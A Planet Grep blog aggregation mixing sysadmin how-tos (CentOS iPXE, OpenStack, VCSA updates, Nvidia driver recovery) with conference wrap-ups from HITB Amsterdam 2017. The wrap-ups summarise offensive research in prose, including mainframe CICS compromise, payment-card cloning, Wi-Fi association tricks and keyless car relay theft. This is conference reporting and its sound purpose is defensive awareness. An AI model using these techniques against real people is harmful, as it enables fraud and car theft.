Channel: Planet Grep

Dries Buytaert: Next steps for evolving Drupal's governance


The last time we made significant changes to our governance was 4 to 5 years ago [1, 2, 3]. It's time to evolve it further. We need to:

  • Update the governance model so governance policies and community membership decisions are not determined by me or by me alone. It is clear that the current governance structure of Drupal, which relies on me being the ultimate decision maker and spokesperson for difficult governance and community membership decisions, has reached its limits. It doesn't work for many in our community -- and frankly, it does not work for me either. I want to help drive the technical strategy and vision of Drupal, not be the arbiter of governance or interpersonal issues.
  • Review our Code of Conduct. Many have commented that the intentions and scope of the Code of Conduct are unclear. For example, some people have asked if violations of the Code of Conduct are the only reasons for which someone might be removed from our community, whether Community Working Group decisions can be made based on actions outside of the Drupal community, or whether we need a Code of Conduct at all. These are all important questions that need clear answers.

I believe that to achieve the best outcome, we will:

  1. Organize both in-person and virtual roundtables during and after DrupalCon Baltimore to focus on gathering direct feedback from the community on evolving our governance.
  2. Refocus the 2-day meeting of the Drupal Association's Board of Directors at DrupalCon Baltimore to discuss these topics.
  3. Collect ideas in the issue queue of the Drupal Governance project. We will share a report from the roundtable discussions (point 1) and the Drupal Association Board Meeting (point 2) in the issue queue so everything is available in one place.
  4. Actively solicit help from experts on diversity, inclusion, experiences of marginalized groups, and codes of conduct and governance. This could include people from both inside and outside the Drupal community (e.g. a leader from another community who is highly respected). I've started looking into this option with the help of the Drupal Association and members of the Community Working Group. We are open to suggestions.

In order to achieve these aims, we plan to organize an in-person Drupal Community Governance sprint in the weeks following DrupalCon Baltimore, involving members of the Drupal Association, the Community Working Group, the Drupal Diversity & Inclusion group, outside experts, as well as some community members who have been critical of our governance. At the sprint, we will discuss feedback gathered by the roundtables, as well as the discussions during the 2-day board meeting at DrupalCon Baltimore, and turn these into concrete proposals: possible modifications to the Code of Conduct, structural changes, expectations of leadership, etc. These proposals will be open for public comment for several weeks or months, to be finalized by DrupalCon Vienna.

We're still discussing these plans, but I wanted to give you some insight into our progress and thinking; once the plans are finalized we'll share them on Drupal.org. Let us know your thoughts on this framework. I'm looking forward to working on solutions with others in the community.


Frank Goossens: Autoptimize 2.2 coming your way, care to test?


So work on Autoptimize 2.2 is almost finished and I need your help testing this version before releasing (targeting May, but that depends on you!). The more people I have testing, the faster I might be able to push this thing out, and there's a lot to look forward to:

  • New option: enable/ disable AO for logged in users for all you pagebuilders out there
  • New minification/ caching system, significantly speeding up your site for non-cached pages (previously part of a power-up)
  • Switched to rel=preload + Filamentgroup’s loadCSS for CSS deferring
  • Additional support for HTTP/2 setups (no GUI, you might need to have a look at the API to see/ use all possibilities)
  • Important improvements to the logic determining which JS/ CSS can be optimized (getPath function), increasing the reliability of the aggregation process
  • Updated to a newer version of the CSS minification component (albeit not the 3.x one, which seems a tad too fresh and would require me to drop support for PHP 5.2; that will happen eventually, just not yet)
  • API: Lots of extra filters, making AO (even) more flexible.
  • Lots of bugfixes and smaller improvements (see GitHub commit log)

So if you want to help:

  1. Download the zip-file from Github
  2. Overwrite the contents of wp-content/plugins/autoptimize with the contents of autoptimize-master from the zip
  3. Test, and if you find any bug (regression), create an issue on GitHub (if it doesn't exist already).
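
If you prefer the command line, steps 1 and 2 roughly translate to the following (the GitHub repository path and your WordPress location are assumptions on my part, adjust to your setup):

# hypothetical command-line version of steps 1 and 2 above
cd /tmp
wget https://github.com/futtta/autoptimize/archive/master.zip
unzip master.zip
# overwrite the plugin with the contents of autoptimize-master (WordPress path assumed)
cp -R autoptimize-master/. /var/www/html/wp-content/plugins/autoptimize/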

Very much looking forward to your feedback!

Mattias Geniar: Nginx might have 33% market share, Apache isn’t falling below 50%



This is a response to a post published by W3 Techs titled "Nginx reaches 33.3% web server market share while Apache falls below 50%". It's gotten massive upvotes on Hacker News, but I believe it's a fundamentally flawed post.

Here's why.

How server adoption is measured

Let's take a quick moment to look at how W3 Techs decides whether a site is running Apache or Nginx. The secret lies in the HTTP headers the server sends with each response.

$ curl -I https://ma.ttias.be 2>/dev/null | grep 'Server:'
Server: nginx

That Server header is collected by W3 Techs and they draw pretty graphs from it.

Cool!

Except you can't rely on the Server header alone for these statistics and claims.

You (often) can't hide the Nginx Server header

Nginx is most often used as a reverse proxy, for TLS, load balancing and HTTP/2. That's a part the article got right.

Nginx is the leading web server supporting some of the more modern protocols, which is probably one of the reasons why people start using it. 76.8% of all sites supporting HTTP/2 use Nginx, while only 2.3% of those sites rely on Apache.

Yes, Nginx offers functionality that's either unstable or hard to get on Apache (i.e. not in the versions in current repositories).

As a result, Nginx is often deployed like this:

: 443 Nginx
|-> proxy to Apache

:80 Nginx
|-> forward traffic from HTTP -> HTTPs
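
To make this concrete, here is a minimal sketch of such an edge configuration (my illustration, not taken from any real setup; the backend port and certificate paths are placeholders):

# hypothetical "nginx at the edge, Apache behind it" vhost
cat > /etc/nginx/conf.d/edge.conf << 'EOF'
server {
    listen 80;
    server_name example.com;
    return 301 https://$host$request_uri;   # forward traffic from HTTP -> HTTPS
}
server {
    listen 443 ssl http2;
    server_name example.com;
    ssl_certificate     /etc/ssl/example.com.crt;
    ssl_certificate_key /etc/ssl/example.com.key;
    location / {
        proxy_pass http://127.0.0.1:8080;   # proxy to Apache, which does the heavy lifting
        proxy_set_header Host $host;
    }
}
EOF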

To the outside world, Nginx is the only HTTP(s) server available. Since measurements of this stat are collected via the Server header, you get this effect.

: 443 Nginx
|- HTTP/1.1 200 OK
|- Server: nginx
|- Cache-Control: max-age=600
|- ...
\
 \
  \ Apache
   |- HTTP/1.1 200 OK
   |- Server: Apache
   |- Cache-Control: max-age=600

Both Apache and Nginx generate a Server header, but Nginx replaces that header with its own as it sends the response to the client. You never see the Apache header, even though Apache is involved.

For instance, here's my website's response:

$ curl -I https://ma.ttias.be 2>/dev/null | grep 'Server:'
Server: nginx

Spoiler: I use Nginx as an HTTP/2 proxy (in Docker) for Apache, which does all the heavy lifting. That header only tells you my edge is Nginx; it doesn't tell you what's behind it.

And since Nginx is most often deployed at the very edge, it's the surviving Server header.

Nginx supplements Apache

Sure, in some stacks Nginx completely replaced Apache; there are clear benefits to doing so. But a few years ago, many sysadmins & devs changed their stack from Apache to Nginx, only to come back to Apache after all.

This created a series of Apache configurations that learned the good parts from Nginx, while keeping the flexibility of Apache (aka .htaccess). As it turns out, Nginx forced a wider use of PHP-FPM (and other runtimes), which were later used with Apache as well.
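
For illustration (my sketch, not from the original post; the socket path is an assumption), this is roughly what that PHP-FPM pattern looks like on Apache 2.4:

# hypothetical Apache 2.4 snippet handing PHP off to PHP-FPM
cat > /etc/httpd/conf.d/php-fpm.conf << 'EOF'
<FilesMatch "\.php$">
    SetHandler "proxy:unix:/run/php-fpm/www.sock|fcgi://localhost"
</FilesMatch>
EOF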

A better title for the original article would be: Nginx runs on 33% of top websites, supplementing Apache deployments.

This is one of those rare occasions where 1 + 1 != 2. Nginx can have 33% market share and Apache can have 85% market share, because they're often combined on the same stack. Things don't have to add up to 100%.

The post Nginx might have 33% market share, Apache isn’t falling below 50% appeared first on ma.ttias.be.

Claudio Ramirez: Post-it: how to revive X on Ubuntu after nvidia kills it


I am not a huge fan of the Linux Nvidia drivers*, but once in a while I try them to check the performance of the machine. More often than not, I end up with a console and no X/Wayland.

I have seen some Ubuntu users reinstall their machine after this f* up, so here are my notes to fix it (I always forget the initramfs step and end up wasting a lot of time):

$ sudo apt-get remove --purge nvidia-*
$ sudo mv /etc/X11/xorg.conf /etc/X11/xorg.conf_pre-nvidia
$ sudo update-initramfs -u
$ reboot
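
Not part of the original notes, but a quick way to check that the open-source nouveau driver took over again after the reboot:

$ lsmod | grep nouveau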

*: I am not a fan of the Windows drivers either, now that Nvidia decided to harvest emails and track you if you want updates.



Frank Goossens: Autoptimize reaches 300K active installs!

Fabian Arrotin: Remotely kicking a CentOS install through a lightweight 1MB iso image


As a sysadmin, you probably deploy your bare-metal nodes through kickstarts in combination with PXE/DHCP. That's the most convenient way to deploy nodes in an existing environment. But what about having to remotely init a new DC/environment, without anything at all? Suppose that you have a standalone node to deploy, but there is no PXE/DHCP environment configured (yet).

The simple solution, as long as you have at least some kind of management/out-of-band network, would be to ask the local DC people to burn the CentOS Minimal iso image to a USB stick or other media. But I needed to deploy a machine without any remote hands available locally to help me. The only things I had were:

  • access to the ipmi interface of that server
  • the fixed IP/netmask/gateway/dns settings for the NIC connected to that segment/vlan

One simple solution would have been to just "attach" the CentOS 7 iso as virtual media, boot the machine, and install from the "locally emulated" cd-rom drive. But that's not something I wanted to do, as the install would then be fed from my local iso image over my "slow" uplink, slowing everything down. Instead, I wanted to use the Gbit link of that server to kick the install. So here is how you can do it with ipxe.iso. iPXE is really helpful for such things. The only "issue" was that I had to configure the NIC first with a fixed IP (remember? no dhcpd yet).

So, download the ipxe.iso image, add it as "virtual media" (the transfer will be fast, as it's under 1MB), and boot the server. Once it boots from the iso image, don't let iPXE run; instead, hit CTRL-B when you see iPXE starting. The reason is that we don't want it to start the dhcp discover/offer/request/ack process, as we know it will not work.

You're then presented with the iPXE shell, so here we go (all parameters are obviously to be adapted, including the net adapter number):

set net0/ip x.x.x.x
set net0/netmask x.x.x.x
set net0/gateway x.x.x.x
set dns x.x.x.x

ifopen net0
ifstat

From that point you should have network connectivity, so we can "just" chainload the CentOS pxe images and start the install:

initrd http://mirror.centos.org/centos/7/os/x86_64/images/pxeboot/initrd.img
chain http://mirror.centos.org/centos/7/os/x86_64/images/pxeboot/vmlinuz net.ifnames=0 biosdevname=0 ksdevice=eth2 inst.repo=http://mirror.centos.org/centos/7/os/x86_64/ inst.lang=en_GB inst.keymap=be-latin1 inst.vnc inst.vncpassword=CHANGEME ip=x.x.x.x netmask=x.x.x.x gateway=x.x.x.x dns=x.x.x.x

Then you can just enjoy your CentOS install running entirely from the network, and so at "full steam"! You can also combine this directly with inst.ks= to have a fully automated setup. Worth knowing: you can also regenerate/build an updated/customized ipxe.iso with those scripts directly. That's more or less what we used to also provide a 1MB universal installer for CentOS 6 and 7 (see https://wiki.centos.org/HowTos/RemoteiPXE), but that one defaults to dhcp.
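
As a sketch (the kickstart URL is hypothetical), the fully automated variant only differs by one extra parameter on the chain line:

# same chain command as above, plus a (hypothetical) kickstart file for an unattended install
chain http://mirror.centos.org/centos/7/os/x86_64/images/pxeboot/vmlinuz net.ifnames=0 biosdevname=0 inst.repo=http://mirror.centos.org/centos/7/os/x86_64/ inst.ks=http://192.0.2.10/ks/node01.cfg ip=x.x.x.x netmask=x.x.x.x gateway=x.x.x.x dns=x.x.x.x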

Hope it helps

Philip Van Hoof: Asynchronous undoable and redoable APIs


Combining QFuture with QUndoCommand made a lot of sense for us. The undo and redo methods of the QUndoCommand can also be asynchronous, of course. We wanted to use QFuture without involving threads, because our asynchronicity comes from a process and IPC, not from a thread. That's the design mistake of QtConcurrent's run method, in my opinion. It meant using QFutureInterface instead (which is undocumented, but luckily public, so it'll remain with us until at least Qt's 6.y.z releases).

So how do we make a QUndoCommand that has an undo method, and a redo method that returns an asynchronous QFuture<ResultType>?

We did just that, today. I'm very satisfied with the resulting API and design. It might have helped if QUndoStack were a QUndoStack<T> and QUndoCommand a QUndoCommand<T>, with undo and redo's return type being T. Just an idea for the Qt 6.y.z developers.

I’m not telling you today, because I want this to settle in our project first. I’m sure we will find problems.

Xavier Mertens: HITB Amsterdam 2017 Day #1 Wrap-Up


I'm back in Amsterdam for the 8th edition of the security conference Hack in the Box. I was not able to attend last year, but I've been attending it for a while (you can re-read all my wrap-ups here). What to say? It's a very strong organisation, everything runs fine, and a good team is dedicated to the attendees. This year, the conference was based on four(!) tracks: two regular ones, one dedicated to more "practical" presentations (HITBlabs) and the last one dedicated to shorter talks (30-60 mins).

Elly van den Heuvel opened the conference with a short 15-minute introduction talk: "How prepared we are for the future?". Elly works for the Dutch government at the "Cyber Security Council". She gave some facts about the current security landscape, from the place of women in infosec (things are changing, slowly) to the message that cyber-security is important for our daily life. For Elly, we are facing a revolution as big as the industrial one, maybe even bigger. Our goal as information security professionals is to build a cyber-secure future for the next generations. There are already nice worldwide initiatives, like the CERTs or NIST and their guidelines. In companies, board members must take responsibility for cyber-security projects (budgets & time must be assigned to them). Elly declared the conference officially open 🙂

The first-day keynote was given by Saumil Shah. The title was "Redefining defences". He started with a warning: this talk is disruptive, and… it was! Saumil began with a step back into the past and a look at how security and vulnerabilities evolved: it started with servers, and today people are targeted. For years, we have implemented several layers of defence, but with the same effect: all of them can be bypassed. Keep in mind that there will always be new vulnerabilities, because products and applications have more and more features and are becoming more complex. I really liked the comparison with the Die Hard movie: it's the Nakatomi building, and we can walk through all the targets exactly as Bruce Willis travels through the building in the movie. Vendors invent new technologies to mitigate the exploits. There was a nice reference to the "Mitigator". The next part of the keynote focused on the CISO's daily job and the fight against auditors. A fact: "compliance is not security". In 2001, the CIO position was split into CIO & CISO, but budgets remained assigned to the CIO as "business enabler". Today, we should have another split: the CISO position must be divided into CISO and COO (Compliance Officer), whose job is to defend against auditors. It was a great keynote, but the audience should have been more C-level people instead of the "technical people" who already agree on all the facts reviewed by Saumil. [Saumil's slides are available here]

After the first coffee break, I had to choose between two tracks. My first choice was already difficult: hacking femtocell devices or IBM mainframes running z/OS. Even if the second focused on a less known environment, mainframes are used in many critical operations, so I decided to attend this talk. Ayoub Elaassal is a pentester who focused on this type of target. People still have an old idea of mainframes. The good old IBM 370 was a big success, but today the reality is different: modern mainframes are badass computers like the IBM zEC 13: 10TB of memory, 141 processors, cryptographic chips, etc. Who uses such computers? Almost every big company, from airlines and healthcare to insurance and finance (have a look at this nice gallery of mainframe consoles). Why? Because it's powerful and stable. Many people (me first) don't know a lot about mainframes: it's not a web app, it uses a 3270 emulator over port 23, but we don't know how it works. On top of the mainframe OS, IBM has an application layer called CICS ("Customer Information Control System"). For Ayoub, it looks like "a combination of Tomcat & Drupal before it was cool". CICS is a very nice target because it is used a lot. Ayoub gave a nice comparison: worldwide, 1.2M requests/sec are performed using the CICS product, while Google handles 200K requests/sec. Impressive! Before exploiting CICS, the first step was to explain how it works. The mainframe world is full of acronyms, not easy to understand immediately. But then Ayoub explained how he abused a mainframe. The first attack was to jailbreak CICS to get console access (just like finding the admin web page). Mainframes contain a lot of juicy information. The next attack was to read sensitive files. Completed too! So, the next step is to pwn the device. CICS has a feature called "spool" functions. A spool is a dataset (or file) containing the output of a job. The idea: generate a dataset and send it to the job scheduler. Ayoub showed a demo of a reverse shell in REXX. Like DC trusts, you can have the same trust between mainframes and push code to another one: replace NODE(LOCAL) by NODE(WASHDC). If the spool feature is not enabled, there are alternative techniques, which were also reviewed. Finally, on to privilege escalation: there are three main levels: Special, Operations and Audit. Special can be considered the "root" level. Those levels are defined by a simple bit in memory; if you can swap it, you get more privileges. That was the last example. From a novice point of view, this was difficult to follow, but basically, mainframes can be compromised like any other computer. The most dangerous aspect is that people using mainframes think they're not targeted. Based on the data stored on them, they are really nice targets. All of Ayoub's scripts are here. [Ayoub's slides are available here]

The next talk was "Can't Touch This: Cloning Any Android HCE Contactless Card" by Slawomir Jasek. Cloning things has always been a dream for people, and they succeeded in 1996 with Dolly the sheep. Later, in 2001, scientists made "Copycat". Today we even have services to clone pets (if you have a lot of money to spend). Even if cloning humans is unethical, it remains a dream. So, why not also clone objects? Especially if it can help to get some money. Mobile contactless payment cards are a good target. It's illegal, but bad guys don't care. Such devices implement a lot of countermeasures, but are we sure they can't be bypassed? Slawomir briefly explained the HCE technology. So, what are the different ways to abuse a payment application? The first one is, of course, to steal the phone. We can steal the card data via NFC (but there are already restrictions: the phone screen must be turned on). We can't pay with that, but for motivated people it should be possible to rebuild the mag stripe. Mobile apps use tokenization: random card numbers are generated for payment and used only for such operations. The transaction is protected by encrypted data. So, the next step is to steal the key. Online? Using man-in-the-middle attacks? Not easy. The key is stored on the phone, and the key itself is also encrypted. How to access it? By reversing the app, but that has a huge cost. What if we copy data across devices? They must be the same (model, OS, IMEI). We can copy the app + data, but it's not easy for a mass-scale attack. The Xposed framework helps to clone the device, but it requires root access, and root detection is implemented in many apps. Slawomir performed a live demo: he copied data between two mobile phones using shell scripts and was able to make a payment with the cloned device. Note that the payments were performed on the same network and with small amounts of money; Google and banks have strong fraud detection systems. What about the Google push messages used by the application? Cloned devices received both messages, but not always (not reliable). Then Slawomir talked about CDCVM, a verification method that asks the user to enter a PIN code but where… on their own device! Some apps do not support it, but there is an API and it is possible to patch the application and enable the support (setting it to "True") via an API call. What about other applications? As usual, some are good while others are bad (e.g. some don't even implement root detection). To conclude, can we prevent cloning? Not completely, but we can make the process more difficult. According to Slawomir, the key is also to improve the backend with strong fraud detection controls (e.g. based on the behaviour of the user). [Slawomir's slides are available here]

After the lunch break, my choice was to attend the talk by Long Liu and Linan Hao (the latter was not present). The abstract looked nice: exploitation of the ChakraCore engine. This is the JavaScript engine developed by Microsoft for its Edge browser; today the framework is open source. Why is it a nice target, according to the speaker? The source code is freely available and Edge is a nice attack surface. Long explained the different bugs they found in the code, which helped them win a lot of hacking contests. The problem was the monotonous voice of the speaker, which just invited you to take a small nap. The presentation ended with a nice demo of a web page visited by Edge popping up a notepad running with system privileges. [Long's slides are available here]

After the break, I switched to track four to attend two short talks. But the quality was there! The first one was by Patrick Wardle: "Meet and Greet with the MacOS Malware Class of 2016". The presentation was a cool overview of the malware that targeted the OSX operating system last year. Yes, OSX is also targeted by malware today! For each of them, he reviewed:

  • The infection mechanism
  • The persistence mechanism
  • The features
  • The disinfection process

The examples covered by Patrick were:

  • Keranger
  • Keydnap
  • FakeFileOpener
  • Mokes
  • Komplex

He also presented some nice tools which could increase the security of your OSX environment. [Patrick’s slides are available here]

The next talk was presented by George Chatzisofroniou and covered a new wireless attack technique called Lure10. Wireless automatic association is not new (see the well-known KARMA attack). This technique has existed for years, but modern operating systems have implemented controls against it. MitM attacks remain interesting, though, because most applications do not implement countermeasures. In Windows 10, open networks are not added to the PNL ("Preferred Networks List"). Microsoft developed a Wi-Fi Sense feature. The Lure10 attack tries to abuse it by making the Windows Location Service think the victim is somewhere else, and then mimicking a Wi-Fi Sense approved local network. In this case, we get an automatic association. A really cool attack that will be implemented in the next release of the wifiphisher framework. [George's slides are available here]

My next choice was to attend a talk about sandboxing: "Shadow-Box: The Practical and Omnipotent Sandbox" by Seunghun Han. In short, Shadow-box is a lightweight hypervisor-based kernel protector. A fact: Linux kernels are everywhere today (computers, IoT, cars, etc). The kernel suffers from vulnerabilities, and the risk of rootkits is always present. The classic ring protection (ring 0) is not enough to protect against those threats: basically, a rootkit changes the system call table and diverts calls to itself to perform malicious activities. The idea behind Shadow-box is to use VT technology to help mitigate those threats. This is called "Ring -1". Previous research was already performed but suffered from many issues (mainly performance); the new research insists on lightweight and practical usage. Seunghun explained in detail how it works and ended with a nice demo: he tried to load a rootkit into a Linux kernel that had the Shadow-box module loaded. Detection was immediate and the rootkit was not installed. Interesting, but is it usable on a day-to-day basis? According to Seunghun, it is; the performance impact on the system is acceptable. [Seunghun's slides are available here]

The last talk of the day focused on Trend Micro products: "I Got 99 Trends and a # is All of Them! How We Found Over 100 RCE Vulnerabilities in Trend Micro Software" by Roberto Suggi Liverani and Steven Seeley. Their research started after the disclosure of earlier vulnerabilities; they decided to find more. Why Trend Micro? Nothing against the company, but it's a renowned vendor, they have a bug bounty program and they want to secure their software. The approach followed was to compromise the products without user interaction. They started with low-hanging fruit, focusing on components like libraries and scripts. They also used the same approach as in malware analysis: check the behaviour and the communications with external services and other components. They reviewed the following products:

  • Smart Protection Server
  • Data Loss Prevention
  • Control Manager
  • Interscan Web Security
  • Threat Discovery Appliance
  • Mobile Security for Enterprise
  • Safesync for Enterprise

The total number of vulnerabilities they found was impressive, and most of them led to remote code execution. For most of them, exploitation was quite trivial. [Roberto's & Steven's slides are available here]

This is the end of day #1. Stay tuned for more tomorrow.

 

[The post HITB Amsterdam 2017 Day #1 Wrap-Up has been first published on /dev/random]


Fabian Arrotin: Deploying Openstack PoC on CentOS with linux bridge


I recently needed to start "playing" with Openstack (working on an existing RDO setup), so I thought it would be a good idea to have my personal playground to start deploying from scratch, then breaking and fixing that playground setup.

At first sight, Openstack looks impressive and "over-engineered", as it's complex and has zillions of modules to make it work. But when you dive into it, you understand that the choice is yours to make it complex or not. Yeah, that sentence can look strange, but I'll explain why.

First, you should just write down your requirements, and only then have a look at the needed openstack components. For my personal playground, I just wanted a basic thing that would let me deploy VMs on demand, in the existing network, directly using a bridge as I want the VMs to be integrated into the existing network/subnet.

So, looking at the architecture diagram, we just need:

  • keystone (needed for the identity service)
  • nova (hypervisor part)
  • neutron (handling the network part)
  • glance (to store the OS images that will be used to create the VMs)

Now that I have my requirements and the list of needed components, let's see how to set up my PoC… The RDO project has good docs for this, including the Quickstart guide. You can follow that guide, and as everything is packaged/built/tested and also delivered through the CentOS mirror network, you can have a working RDO/openstack all-in-one setup in minutes…

The only issue is that it doesn't fit my need, as it will set up unneeded components, and the network layout isn't the one I wanted either, as it will be based on openvswitch and other rules (multiple layers I wanted to get rid of). The good news is that Packstack is in fact a wrapper tool around puppet modules, and it also supports lots of options to configure your PoC.

Let's assume that I want a PoC based on openstack-newton, and that my machine has two NICs: eth0 for the mgmt network and eth1 for the VMs network. You don't need to configure the bridge on the eth1 interface, as that will be done automatically by neutron. So let's follow the quickstart guide, but adapt the packstack command line:

yum install centos-release-openstack-newton -y
systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network
yum install -y openstack-packstack

Let's fix eth1 to ensure that it's started but without any IP on it:

sed -i 's/BOOTPROTO="dhcp"/BOOTPROTO="none"/' /etc/sysconfig/network-scripts/ifcfg-eth1
sed -i 's/ONBOOT="no"/ONBOOT="yes"/' /etc/sysconfig/network-scripts/ifcfg-eth1
ifup eth1

And now let's call packstack with the required options so that we'll use a basic linux bridge (and so no openvswitch), and instruct it to use eth1 for that mapping:

packstack --allinone --provision-demo=n --os-neutron-ml2-type-drivers=flat --os-neutron-ml2-mechanism-drivers=linuxbridge --os-neutron-ml2-flat-networks=physnet0 --os-neutron-l2-agent=linuxbridge --os-neutron-lb-interface-mappings=physnet0:eth1 --os-neutron-ml2-tenant-network-types=' ' --nagios-install=n 

At this stage we have the openstack components installed, and a /root/keystonerc_admin file that we can source for openstack CLI operations. We have instructed neutron to use linuxbridge, but we haven't (yet) created a network and a subnet tied to it, so let's do that now:

source /root/keystonerc_admin
neutron net-create --shared --provider:network_type=flat --provider:physical_network=physnet0 othernet
neutron subnet-create --name other_subnet --enable_dhcp --allocation-pool=start=192.168.123.1,end=192.168.123.4 --gateway=192.168.123.254 --dns-nameserver=192.168.123.254 othernet 192.168.123.0/24

Before importing image[s] and creating instances, there is one thing left to do: instruct the dhcp_agent that metadata for cloud-init inside the VM will not be served from the traditional "router" inside openstack. And also don't forget to let traffic (in/out) pass through the security group (see doc).

Just be sure to have enable_isolated_metadata = True in /etc/neutron/dhcp_agent.ini and then systemctl restart neutron-dhcp-agent: from that point, cloud metadata will be served from dhcp too.
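
If you have crudini available (it ships in the EPEL/RDO repos), that change can be scripted as follows; a one-liner sketch of mine, not from the original post:

# set the option in the [DEFAULT] section and restart the agent
crudini --set /etc/neutron/dhcp_agent.ini DEFAULT enable_isolated_metadata True
systemctl restart neutron-dhcp-agent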

From that point you can just follow the quickstart guide to create projects/users, import images and create instances, all from the CLI too.
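
As a sketch of those next steps (the image file, flavor and instance name are placeholders of mine, not from the post):

# import a CentOS cloud image and boot a VM on the "othernet" network
source /root/keystonerc_admin
glance image-create --name centos7 --disk-format qcow2 --container-format bare --file CentOS-7-x86_64-GenericCloud.qcow2
# Newton no longer ships default flavors, so create one if needed
nova flavor-create m1.small auto 2048 20 1
NETID=$(neutron net-show othernet -F id -f value)
nova boot --flavor m1.small --image centos7 --nic net-id=$NETID myvm01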

One last remark with linuxbridge in an existing network: as neutron will have a dhcp-agent listening on the bridge, the provisioned VMs will get an IP from the pool declared in the "neutron subnet-create" command. However (and I saw this when I added other compute nodes to the same setup), you'll have a potential conflict with an existing dhcpd instance on the same segment/network, so your VMs can potentially get their IP from your existing dhcpd instance and not from neutron. As a workaround, you can just make your existing dhcpd ignore the MAC address range used by openstack, so that your VMs will always get their IP from neutron's dhcp. To do this, there are different options, depending on your local dhcpd instance:

  • for dnsmasq: dhcp-host=fa:16:3e:*:*:*,ignore (see doc)
  • for ISC dhcpd : "ignore booting" (see doc)

The default MAC address range for openstack VMs indeed starts at fa:16:3e:00:00:00 (see /etc/neutron/neutron.conf, where that can be changed too).

Those were some of my findings for my openstack PoC/playground. Now that I understand all this a little bit better, I'm currently working on some puppet integration, as there are official openstack puppet modules available on git.openstack.org that one can import to deploy/configure openstack (better than using packstack). But there are lots of "yaks to shave" to get to that point, so that's surely for another future blog post.

Bert de Bruijn: Updating VCSA on a private network

Updating the VCSA is easy when it has internet access or when you can mount the update iso. On a private network, VMware assumes you have a webserver that can serve the updaterepo files. In this article, we'll look at how to proceed when the VCSA is on a private network where internet access is blocked and there's no webserver available. The VCSA and PSC contain their own webserver that can be used for an HTTP-based update. This procedure was tested on PSC/VCSA 6.0.

Follow these steps:


  • First, download the update repo zip (e.g. for 6.0 U3A, the filename is VMware-vCenter-Server-Appliance-6.0.0.30100-5202501-updaterepo.zip ) 
  • Transfer the updaterepo zip to a PSC or VCSA that will be used as the server. You can use Putty's pscp.exe on Windows or scp on Mac/Linux, but you'd have to run "chsh -s /bin/bash root" in the CLI shell before using pscp.exe/scp if your PSC/VCSA is set up with the appliancesh. 
    • chsh -s /bin/bash root
    • "c:\program files (x86)\putty\pscp.exe" VMware*updaterepo.zip root@psc-name-or-address:/tmp 
  • Change your PSC/VCSA root access back to the appliancesh if you changed it earlier: 
    • chsh -s /bin/appliancesh root
  • Make a directory for the repository files and unpack the updaterepo files there:
    • mkdir /srv/www/htdocs/6u3
    • chmod go+rx /srv/www/htdocs/6u3
    • cd /srv/www/htdocs/6u3
    • unzip /tmp/VMware-vCenter*updaterepo.zip
    • rm /tmp/VMware-vCenter*updaterepo.zip
  • Create a redirect using the HTTP rhttpproxy listener and restart it
    • echo "/6u3 local 7000 allow allow"> /etc/vmware-rhttpproxy/endpoints.conf.d/temp-update.conf 
    • /etc/init.d/vmware-rhttpproxy restart 
  • Create a /tmp/nginx.conf (I didn't save mine, but "listen 7000" is the key change from the default; a reconstructed sketch follows below)
  • Start nginx
    • nginx -c /tmp/nginx.conf
  • Start the update via the VAMI. Change the repository URL in settings, using http://psc-name-or-address/6u3/ as the repository URL. Then use "Check URL". 
  • Afterwards, clean up: 
    • killall nginx
    • cd /srv/www/htdocs; rm -rf 6u3
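
Since I didn't save my config, here is a hypothetical reconstruction of what /tmp/nginx.conf could look like; the only essential difference from the stock config is "listen 7000", and the document root matches the directory used above:

# reconstructed /tmp/nginx.conf -- "listen 7000" is the key line
cat > /tmp/nginx.conf << 'EOF'
worker_processes  1;
events { worker_connections  1024; }
http {
    include       mime.types;
    default_type  application/octet-stream;
    server {
        listen  7000;
        root    /srv/www/htdocs;
    }
}
EOF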


P.S. I personally tested this using a PSC as webserver to update both that PSC, and also a VCSA appliance.
P.P.S. VMware released an update for VCSA 6.0 and 6.5 on the day I wrote this. For 6.0, the latest version is U3B at the time of writing, while I updated to U3A.

Xavier Mertens: HITB Amsterdam 2017 Day #2 Wrap-Up


After a nice evening with some beers and an excellent dinner with infosec peers, here is my wrap-up for the second day. Coffee? Check! Wireless? Check! Twitter? Check!

As usual, the day started with a keynote. Window Snyder presented "All Fall Down: Interdependencies in the Cloud". Window is the CSO of Fastly and, like many companies today, Fastly relies on many services running in the cloud. This reminds me of the Amazon S3 outage and their dashboard that was not working because it was relying on… S3! Today, everything is interconnected and the overall security depends on the complete chain. To summarize: you use a cloud service to store your data, you authenticate to it using another cloud service, you analyse your data using a third one, etc. If one is failing, we can face a domino effect. Many companies have statements like "We take security very seriously" but they don't invest. Window reviewed some nightmare stories where security completely failed, like the RSA token compromise in 2011, Diginotar in 2012 or Target in 2013. But sometimes dependencies are very simple, like DNS… What if your DNS is out of service? All your infrastructure is down. DNS remains an Achilles' heel for many organizations. The keynote was interesting but very short! Anyway, it meant more time for coffee…

The first regular talk was maybe the most anticipated: "Chasing Cars: Keyless Entry System Attacks". The talk was promoted via social networks before the conference. I was really curious and was not disappointed by the result of the research! Yingtao Zeng, Qing Yang & Jun Li presented their work on keyless car attacks. Oddly, the guy responsible for most of the research did not speak English: he spoke in Chinese to his colleague, who translated into English. Because users are looking for more convenience (and because it's "cool"), modern cars no longer use RKE (remote keyless entry) but PKE (passive keyless entry). They started with a technical description of the technology that many of us use daily:

Passive key entry system

How to steal the car? How could we use the key in the car owner's pocket? The idea was to perform a relay attack: the signal of the key is relayed from the owner's pocket to the attacker sitting next to the car. Keep in mind that cars require pressing a button on the door or using a contact sensor to enable communications with the key. A wake-up is sent to the key, which unlocks the doors. The relay attack scenario looks like this:

Relay attack scenario

During this process, there are time constraints. They showed a nice demo of a guy leaving his car, followed by attacker #1 who captures the signal and relays it to attacker #2, who unlocks the car.

Relay devices

The current range to reach the car owner's key is ~2m. Between the two relays, up to 300m! What about the cost of building the devices? Approximately €20 (the cost of the main components)! What about a real case? Once the car is stolen and the engine running, it will only warn that the key is not present, but it won't stop! The only limit is running out of gas 🙂 Countermeasures: use a Faraday cage or bag, remove the battery, or enforce stricter timing constraints.

They are still improving the research and are now investigating how to relay the signal over TCP/IP (read: the wild Internet). [Slides are available here]

